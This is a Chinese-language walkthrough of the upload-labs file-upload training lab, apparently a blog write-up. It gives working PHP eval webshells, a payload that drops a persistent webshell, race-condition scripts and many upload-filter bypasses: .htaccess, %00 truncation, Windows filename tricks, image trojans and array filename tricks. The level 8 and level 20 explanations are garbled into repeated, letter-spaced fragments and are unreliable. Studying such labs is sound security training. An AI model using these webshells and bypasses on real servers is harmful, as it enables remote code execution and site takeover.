文件上传upload-lads
第一关 前端绕过(js)
本关是对文件名的过滤(在客户端进行)
即若文件名中存在php等后缀则直接过滤(弹窗)
上传一个webshell到服务器
但只容许上传".jpg|.png|.gif";
".jpg|.png|.gif";
jpg。png。gif的文件都不可执行,所以需要上传.php的文件
创建1.jpg
写入一句话木马
GIF89a
<?php @eval ($_POST[pass] ) ;?>
使用bp重放
修改文件名为1.php即可
或者
因为是进行前端JS校验,因此可以直接在浏览器检查代码把checkFile()函数删了或者也可以把红色框改成true,并按回车,即可成功上传php文件
第二关 后端验证Content-type
服务器过滤
传入.php的一句话
修改Content-Type: application/octet-stream
为image/jpeg或者image/png
即可上传
第三关 黑名单绕过
用黑名单不允许上传.asp,.aspx,.php,.jsp后缀的文件
但可以上传.phtml .phps .php5 .pht. php3
前提是apache的httpd.conf中有如下配置代码:
AddType application/x-httpd-php .php .phtml .phps .php5 .pht
改完之后即可上传成功
(尝试后发现php5会连接出错,php3可以)
第四关 .htaccess绕过
知识点:.htaccess是一个纯文本文件,里面存放着Apache服务器配置相关的一些指令,它类似于Apache的站点配置文件
httpd.conf(Apache2已经支持多站点,因此你的站点配置文件可能在/etc/apache2/conf.d/目录下)。 .htaccess与httpd.conf配置文件不同的是,它只作用于当前目录。
另外httpd.conf是在Apache服务启动的时候就加载的,而.htaccess只有在用户访问目录时加载
黑名单拒绝了几乎所有有问题的后缀名,除了.htaccess
前提条件(1.mod_rewrite模块开启。2.AllowOverride All)
因此先上传一个.htaccess文件,内容如下:
SetHandler application/x-httpd-php
这样所有文件都会当成php来解析
.htaccess文件不能有文件名,否则不运行
之后传入含有一句话木马的.jpg即可连接
第五关 大小写绕过
查看源码得知
相比于pass-4,过滤了.htaccess,但将后缀转换为小写去掉了,因此可以使用大小绕过
传入big and little**.PHP**即可
window值是window根据windows特性所使用的漏洞,服务器为linux时不适用
window第六关 空格绕过
查看源码得知
相比pass-4 取消了前后空格的过滤
所以使用bp在.php后加空格即可(.php )
利用Windows系统的文件名特性。文件名最后增加空格,写成06.php ,上传后保存在Windows系统上的文件名最后的一个空格会被去掉,实际上保存的文件名就是06.php
window第七关 点绕过
没有对后缀名末尾的点进行处理,利用windows特性,会自动去掉后缀名中最后的”.”,可在后缀名中加”.”绕过:
window第八关 ::$DATA绕过
没有对后缀名中的’:: D A T A ’ 进 行 过 滤 。 在 p h p + w i n d o w s 的 情 况 下 : 如 果 文 件 名 + " : : DATA’进行过滤。在php+windows的情况下:如果文件名+":: DATA’进行过滤。在php+windows的情况下:如果文件名+"::DATA"会把:: D A T A 之 后 的 数 据 当 成 文 件 流 处 理 , 不 会 检 测 后 缀 名 . 且 保 持 " : : DATA之后的数据当成文件流处理,不会检测后缀名.且保持":: DATA之后的数据当成文件流处理,不会检测后缀名.且保持"::DATA"之前的文件名。利用windows特性,可在后缀名中加” ::$DATA”绕过:
windows第九关 点+空格+点绕过
代码先是去除文件名前后的空格,再去除文件名最后所有的.,再通过strrchar函数来寻找.来确认文件名的后缀,但是最后保存文件的时候没有重命名而使用的原始的文件名,导致可以利用1.php. .(点+空格+点)来绕过
第十关 双写绕过(pphphp)
黑名单过滤,将黑名单里的后缀名替换为空且只替换一次,因此可以用双写绕过
后缀改为.pphphp
即可
第十一关GET%00截断
本题使用buu应该无法复现(buu可能是linux服务器)
php.ini文件里的magic_quotes_gpc可以为true
所以无法上传%00截断的文件
本机上:
通过抓包截断将【evil.php.jpg】后面的一个【.】换成【0x00】。在上传的时候,当文件系统读到【0x00】时,会认为文件已经结束,从而将【evil.php.jpg】的内容写入到【evil.php】中,从而达到攻击的目的。
截断条件:
php版本小于5.3.4 详情关注CVE-2006-7243
php的magic_quotes_gpc为OFF状态
关键代码:
$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
因为img_path是直接拼接的所以可以用00截断
可以通过截断上传(0x00,%00,/00 )实现。
上传路径名%00截断绕过。上传的文件名写成one.jpg,
save_path改成…/upload/one.php%00,最后保存下来的文件就是one.php
第十二关 post%00截断
$img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
save_path使用post的方法接收
save_path参数通过POST方式传递,还是利用00截断,因为POST不会像GET对%00进行自动解码,所以需要在二进制中进行修改。
第十三关 图片马+文件包含漏洞绕过
$bin = fread($file, 2); //只读2字节
通过读文件的前2个字节判断文件类型,因此直接上传图片马即可,制作图片马:
cmd:
copy 图片.jpg /b + hack.php /a shell.jpg
注:/b是转换二进制 /a是转换ascll码
直接访问图片并不能把图片当做PHP解析,因此还需要利用文件包含漏洞
题目直接给出了,构造即可
payload:
?include.php?upload/3020211007002439.jpg
第十四关 getimagesize()-图片
这题是用getimagesize函数判断文件类型,还是可以图片马绕过,方法同pass-13
$info = getimagesize($filename);
第十五题 exif_imagetype()-图片马
这里用到php_exif模块来判断文件类型,用图片马绕过,方法同pass-13
$image_type = exif_imagetype($filename);
第十六关 二次渲染绕过
这一关对上传图片进行了判断了后缀名、content-type,以及利用imagecreatefromgif判断是否为gif图片,最后再做了一次二次渲染,但是后端二次渲染需要找到渲染后的图片里面没有发生变化的Hex地方,添加一句话,通过文件包含漏洞执行一句话,使用蚁剑进行连接
这里有个小提示,对于做文件上传之二次渲染建议用GIF图片,相对于简单一点
上传正常的GIF图片下载回显的图片,用010Editor编辑器进行对比两个GIF图片内容,找到相同的地方(指的是上传前和上传后,两张图片的部分Hex仍然保持不变的位置)并插入PHP一句话,上传带有PHP一句话木马的GIF图片
利用文件包含漏洞
蚁剑连接即可
第十七关 条件竞争一
这道题复现了好久但就是不行,猜测是buu有防护使用bp进行攻击会停止访问,导致题目无法复现,这里是大佬在本机上配置的环境做的复现
提示是需要代码审计
$is_upload = false;
$msg = null;if(isset($_POST['submit'])){$ext_arr = array('jpg','png','gif');$file_name = $_FILES['upload_file']['name'];$temp_file = $_FILES['upload_file']['tmp_name'];$file_ext = substr($file_name,strrpos($file_name,".")+1);$upload_file = UPLOAD_PATH . '/' . $file_name;if(move_uploaded_file($temp_file, $upload_file)){if(in_array($file_ext,$ext_arr)){$img_path=UPLOAD_PATH.'/'.rand(10,99).date("YmdHis").".".$file_ext;rename($upload_file, $img_path);$is_upload = true;}else{$msg = "只允许上传.jpg|.png|.gif类型文件!";unlink($upload_file);}
}else{$msg = '上传出错!';}
}
从源码来看,服务器先是将上传的文件保存下来,然后将文件的后缀名同白名单对比,如果是jpg、png、gif中的一种,就将文件进行重命名。如果不符合的话,unlink()函数就会删除该文件。
这么看来如果我们还是上传一个图片马的话,网站依旧存在文件包含漏洞我们还是可以进行利用。(默认是没有文件上传漏洞的)但是如果没有文件包含漏洞的话,我们就只能上传一个php木马来解析运行了。
那还怎么搞?上传上去就被删除了,我还怎么去访问啊。
不慌不慌,要知道代码执行的过程是需要耗费时间的。如果我们能在上传的一句话被删除之前访问不就成了。这个也就叫做条件竞争上传绕过。
我们可以利用burp多线程发包,然后不断在浏览器访问我们的webshell,会有一瞬间的访问成功。
为了更好的演示效果,把一句话木马换一下改为:
<?php fputs(fopen('Tony.php','w'),'<?php @eval($_POST["Tony"])?>');?>
把这个php文件通过burp一直不停的重放,然后再写python脚本去不停的访问我们上传的这个文件,总会有那么一瞬间是还没来得及删除就可以被访问到的,一旦访问到该文件就会在当前目录下生成一个Tony.php的一句话。在正常的渗透测试中这也是个好办法。因为单纯的去访问带有phpinfo()的文件并没有什么效果。一旦删除了还是无法利用。但是这个办法生成的Tony.php服务器是不会删除的,我们就可以通过蚁剑去链接了。
首先,我们上传PHP文件,用BP拦截
进行下一步操作前,这里有个小细节,就是不要把BP的拦截功能关闭了,要一直保持拦截状态以达到测试更好的效果
然后选择Clear$
接着设置无限发送空的Payloads,来让它一直上传该文件
然后我们写一个python脚本,通过它来不停的访问我们上传上去的PHP文件(即如上图显示的zoe.php文件) 由于隐私原因,IP地址不能放出来,下面的脚本的url地址XXX都是代表IP地址
import requests
url = "http://xxx.xxx.xxx.xxx/upload-labs/upload/zoe.php"
while True:html = requests.get(url)if html.status_code == 200:print("OK")break
接下来我们可以在BP点击开始攻击
可以看到上传该文件的数据包不停地在进行重放。
在BP攻击的同时我们也要运行python脚本,目的就是不停地访问zoe.php知道成功访问到为止。当出现OK说明访问到了该文件,那么Tony.php应该也创建成功了,用蚁剑连一下即可
第十八关 条件竞争二
靶场有点问题不管传什么文件都传不到upload目录下,需要进行修改
同上题
打开第十八关,发现还是需要代码审计。那么再来看看源码吧。
从源码来看的话,服务器先是将文件后缀跟白名单做了对比,然后检查了文件大小以及文件是否已经存在。文件上传之后又对其进行了重命名。
这么看来的话,php是不能上传了,只能上传图片马了,而且需要在图片马没有被重命名之前访问它。要让图片马能够执行还要配合其他漏洞,比如文件包含,apache解析漏洞等。
这里还是将前一关的代码插入图片作出图片马。然后通过文件包含去访问该图片马。
<?php fputs(fopen('Tony.php','w'),'<?php @eval($_POST["Tony"])?>');?>
第二步:上传图片马,用BP拦截(基本上在BP上的操作跟上面第17关没区别)
然后我们要修改一下python脚本,不能再用回第17关的脚本了,这里脚本要修改为文件包含来访问(由于隐私原因,IP地址不能放出来,下面的脚本的url地址XXX都是代表IP地址)
import requests
url = "http://xxx.xxx.xxx.xx/upload-labs/include.php?file=upload/pass19.png"
while True:html = requests.get(url)if ( 'Warning' not in str(html.text)):print('ok')break
当出现OK说明访问到了该文件,那么Tony.php应该也创建成功了,用蚁剑连一下试试。
第十九关 00截断
$file_name = $_POST['save_name'];$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);if(!in_array($file_ext,$deny_ext)) {$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH . '/' .$file_name;
发现move_uploaded_file()函数中的img_path是由post参数save_name控制的,因此可以在save_name利用00截断绕过,方法同pass-12
或者
没有对上传的文件做判断,只对用户输入的文件名做判断
后缀名黑名单
上传的文件名用户可控
黑名单用于用户输入的文件后缀名进行判断
move_uploaded_file()还有这么一个特性,会忽略掉文件末尾的 /.
先准备PHP一句话木马,并把后缀名改为PNG再上传
然后用BP来抓包,效果如下图,就是在upload-19.jpg改为upload-19.php/.
修改完直接放包,然后复制图片地址,用蚁剑连接
第二十关
不是很懂看完大佬的wp后,理解了一点
这一关白名单
验证过程:
–> 验证上传路径是否存在
–> 验证[‘upload_file’]的content-type是否合法(可以抓包修改)
–> 判断POST参数是否为空定义 f i l e 变 量 ( 关 键 : 构 造 数 组 绕 过 下 一 步 的 判 断 ) − − > 判 断 f i l e 不 是 数 组 则 使 用 e x p l o d e ( ′ . ′ , s t r t o l o w e r ( file变量(关键:构造数组绕过下一步的判断) -->判断file不是数组则使用explode('.', strtolower( file变量(关键:构造数组绕过下一步的判断)−−>判断file不是数组则使用explode(′.′,strtolower(file))对file进行切割,将file变为一个数组
–> 判断数组最后一个元素是否合法
–> 数组第一位和 f i l e [ c o u n t ( file[count( file[count(file) - 1]进行拼接,产生保存文件名file_name
–> 上传文件
补充知识:
explode(separator,string[,limit]) 函数,使用一个字符串分割另一个字符串,并返回由字符串组成的数组。
end(array)函数,输出数组中的当前元素和最后一个元素的值。
reset(array)函数,把数组的内部指针指向第一个元素,并返回这个元素的值
count(array)函数,计算数组中的单元数目,或对象中的属性个数
首先准备PHP一句话木马
bp拦截
我们要改的就是下面的要求修改content-type
修改POST参数为数组类型,索引[0]为`upload-20.php`,索引[2]为`jpg|png|gif`。
只要第二个索引`不为1`,$file[count($file) - 1]就等价于$file[2-1],值为空
放包
复制图片地址,用蚁剑进行连接,这里有个细节,可能有人会问蚁剑连接的URL地址
.php后面有一个点,我们需不需要把它删了,其实这个点删不删没所谓,不影响的,照样能连上
欢迎交流
